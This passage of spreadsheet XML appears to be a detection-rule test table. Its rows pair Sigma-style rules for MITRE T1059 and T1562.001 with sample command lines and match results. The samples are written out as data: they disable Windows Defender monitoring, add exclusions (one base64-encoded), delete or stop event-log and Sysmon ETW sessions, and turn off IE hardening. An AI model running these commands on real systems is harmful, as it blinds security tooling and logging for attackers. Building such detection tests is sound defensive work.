      </c>
      <c r="G2803" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2803" s="43" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution (f426547a-e0f7-441a-b63e-854ac5bdf54d)</t>
        </is>
      </c>
      <c r="J2803" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2803" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2804" ht="15.75" customHeight="1" s="42">
      <c r="A2804" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2804" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2804" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D2804" s="43" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E2804" s="43" t="inlineStr">
        <is>
          <t>ftp -s script.txt</t>
        </is>
      </c>
      <c r="F2804" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2804" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2804" s="43" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution (f426547a-e0f7-441a-b63e-854ac5bdf54d)</t>
        </is>
      </c>
      <c r="J2804" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2804" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2805" ht="15.75" customHeight="1" s="42">
      <c r="A2805" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2805" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C2805" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D2805" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E2805" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp\</t>
        </is>
      </c>
      <c r="F2805" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2805" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2805" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J2805" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2805" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2806" ht="15.75" customHeight="1" s="42">
      <c r="A2806" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2806" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2806" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2806" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2806" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Remove-Item 'HKCR\*\shellex\ContextMenuHandlers\EPP'"</t>
        </is>
      </c>
      <c r="F2806" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2806" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2806" s="43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J2806" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2806" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2807" ht="15.75" customHeight="1" s="42">
      <c r="A2807" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2807" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2807" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2807" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2807" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'" -ExecutionPolicy Bypass</t>
        </is>
      </c>
      <c r="F2807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2807" s="43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J2807" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2807" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2808" ht="15.75" customHeight="1" s="42">
      <c r="A2808" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2808" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2808" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2808" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2808" s="43" t="inlineStr">
        <is>
          <t>pwsh -Command "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'"</t>
        </is>
      </c>
      <c r="F2808" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2808" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed (b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b)</t>
        </is>
      </c>
      <c r="J2808" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2808" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2809" ht="15.75" customHeight="1" s="42">
      <c r="A2809" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2809" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C2809" s="43" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D2809" s="43" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E2809" s="43" t="inlineStr">
        <is>
          <t>dism.exe /Online /Disable-Feature -FeatureName:Windows-Defender /Quiet /NoRestart</t>
        </is>
      </c>
      <c r="F2809" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2809" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2809" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2809" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed (b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b)</t>
        </is>
      </c>
      <c r="J2809" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2809" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2810" ht="15.75" customHeight="1" s="42">
      <c r="A2810" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2810" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_logman_disable_eventlog</t>
        </is>
      </c>
      <c r="C2810" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Trace ETW Session Tamper Via Logman.EXE</t>
        </is>
      </c>
      <c r="D2810" s="43" t="inlineStr">
        <is>
          <t>cd1f961e-0b96-436b-b7c6-38da4583ec00</t>
        </is>
      </c>
      <c r="E2810" s="43" t="inlineStr">
        <is>
          <t>logman.exe delete EventLog-System</t>
        </is>
      </c>
      <c r="F2810" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2810" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2810" s="43" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J2810" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2810" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2811" ht="15.75" customHeight="1" s="42">
      <c r="A2811" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2811" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_logman_disable_eventlog</t>
        </is>
      </c>
      <c r="C2811" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Trace ETW Session Tamper Via Logman.EXE</t>
        </is>
      </c>
      <c r="D2811" s="43" t="inlineStr">
        <is>
          <t>cd1f961e-0b96-436b-b7c6-38da4583ec00</t>
        </is>
      </c>
      <c r="E2811" s="43" t="inlineStr">
        <is>
          <t>logman.exe -stop "SYSMON TRACE"</t>
        </is>
      </c>
      <c r="F2811" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2811" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2811" s="43" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9); Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J2811" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2811" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2812" ht="15.75" customHeight="1" s="42">
      <c r="A2812" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2812" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_logman_disable_eventlog</t>
        </is>
      </c>
      <c r="C2812" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Trace ETW Session Tamper Via Logman.EXE</t>
        </is>
      </c>
      <c r="D2812" s="43" t="inlineStr">
        <is>
          <t>cd1f961e-0b96-436b-b7c6-38da4583ec00</t>
        </is>
      </c>
      <c r="E2812" s="43" t="inlineStr">
        <is>
          <t>logman.exe delete SysmonDnsEtwSession</t>
        </is>
      </c>
      <c r="F2812" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2812" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2812" s="43" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9); Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J2812" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2812" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2813" ht="15.75" customHeight="1" s="42">
      <c r="A2813" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2813" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_logman_disable_eventlog</t>
        </is>
      </c>
      <c r="C2813" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Trace ETW Session Tamper Via Logman.EXE</t>
        </is>
      </c>
      <c r="D2813" s="43" t="inlineStr">
        <is>
          <t>cd1f961e-0b96-436b-b7c6-38da4583ec00</t>
        </is>
      </c>
      <c r="E2813" s="43" t="inlineStr">
        <is>
          <t>logman.exe stop EventLog-Application</t>
        </is>
      </c>
      <c r="F2813" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2813" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2813" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2813" s="43" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9); Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J2813" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2813" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2814" ht="15.75" customHeight="1" s="42">
      <c r="A2814" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2814" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C2814" s="43" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D2814" s="43" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E2814" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-MpPreference -ExclusionPath C:\\test"</t>
        </is>
      </c>
      <c r="F2814" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2814" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2814" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2814" s="43" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J2814" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2814" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2815" ht="15.75" customHeight="1" s="42">
      <c r="A2815" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2815" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C2815" s="43" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D2815" s="43" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E2815" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand UwBlAHQALQBNAHAARQByAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXAB0AGUAcwB0AA==</t>
        </is>
      </c>
      <c r="F2815" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2815" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2815" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2815" s="43" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J2815" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2815" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2816" ht="15.75" customHeight="1" s="42">
      <c r="A2816" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2816" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_disable_feature</t>
        </is>
      </c>
      <c r="C2816" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Disable Scan Feature</t>
        </is>
      </c>
      <c r="D2816" s="43" t="inlineStr">
        <is>
          <t>1ec65a5f-9473-4f12-97da-622044d6df21</t>
        </is>
      </c>
      <c r="E2816" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring 1"</t>
        </is>
      </c>
      <c r="F2816" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2816" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2816" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2816" s="43" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J2816" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2816" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2817" ht="15.75" customHeight="1" s="42">
      <c r="A2817" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2817" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_exclusion</t>
        </is>
      </c>
      <c r="C2817" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion</t>
        </is>
      </c>
      <c r="D2817" s="43" t="inlineStr">
        <is>
          <t>17769c90-230e-488b-a463-e05c08e9d48f</t>
        </is>
      </c>
      <c r="E2817" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-MpPreference -ExclusionPath C:\\Temp"</t>
        </is>
      </c>
      <c r="F2817" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2817" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2817" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2817" s="43" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J2817" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2817" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2818" ht="15.75" customHeight="1" s="42">
      <c r="A2818" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2818" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_exclusion</t>
        </is>
      </c>
      <c r="C2818" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion</t>
        </is>
      </c>
      <c r="D2818" s="43" t="inlineStr">
        <is>
          <t>17769c90-230e-488b-a463-e05c08e9d48f</t>
        </is>
      </c>
      <c r="E2818" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-MpPreference -ExclusionPath `"C:\\Temp`""</t>
        </is>
      </c>
      <c r="F2818" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2818" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2818" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2818" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential AMSI Bypass Using NULL Bits (92a974db-ab84-457f-9ec0-55db83d7a825); Potential AMSI Bypass Using NULL Bits (92a974db-ab84-457f-9ec0-55db83d7a825)</t>
        </is>
      </c>
      <c r="J2818" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2818" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2819" ht="15.75" customHeight="1" s="42">
      <c r="A2819" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2819" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2819" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2819" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2819" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Set-MpPreference -DisableBehaviorMonitoring 1</t>
        </is>
      </c>
      <c r="F2819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2819" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2819" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J2819" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2819" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2820" ht="15.75" customHeight="1" s="42">
      <c r="A2820" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2820" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2820" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2820" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2820" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe Set-MpPreference -DisableBehaviorMonitoring $true</t>
        </is>
      </c>
      <c r="F2820" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2820" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2820" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2820" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J2820" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2820" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2821" ht="15.75" customHeight="1" s="42">
      <c r="A2821" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2821" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2821" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2821" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2821" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c Set-MpPreference -DisableBehaviorMonitoring $true</t>
        </is>
      </c>
      <c r="F2821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2821" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2821" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J2821" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2821" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2822" ht="15.75" customHeight="1" s="42">
      <c r="A2822" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2822" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2822" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2822" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2822" s="43" t="inlineStr">
        <is>
          <t>Set-ItemProperty -Path "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" -Name 'IEHarden' -Value 0</t>
        </is>
      </c>
      <c r="F2822" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2822" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2822" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2822" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J2822" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2822" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2823" ht="15.75" customHeight="1" s="42">
      <c r="A2823" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2823" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2823" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2823" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2823" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}" /v IsInstalled /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2823" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2823" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2823" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J2823" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2823" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2824" ht="15.75" customHeight="1" s="42">
      <c r="A2824" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2824" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2824" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2824" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2824" s="43" t="inlineStr">
        <is>
          <t>reg add 'HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}' /v IsInstalled /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2824" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2824" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2824" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2824" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J2824" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2824" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2825" ht="15.75" customHeight="1" s="42">
      <c r="A2825" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2825" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2825" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2825" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2825" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}" /f /v IsInstalled /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F2825" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2825" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2825" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2825" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service (c49c5062-0966-4170-9efd-9968c913a6cf)</t>
        </is>
      </c>
      <c r="J2825" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2825" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2826" ht="15.75" customHeight="1" s="42">
      <c r="A2826" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2826" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2826" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2826" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2826" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Item -Path 'function:\Remove-MpPreference' -Value { param($a) Write-Host 'Simulated' } ; Remove-MpPreference -ControlledFolderAccessProtectedFolders 'C:\'"</t>
        </is>
      </c>
      <c r="F2826" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2826" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2826" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2826" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE (48917adc-a28e-4f5d-b729-11e75da8941f)</t>
        </is>
      </c>
      <c r="J2826" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2826" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2827" ht="15.75" customHeight="1" s="42">
      <c r="A2827" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
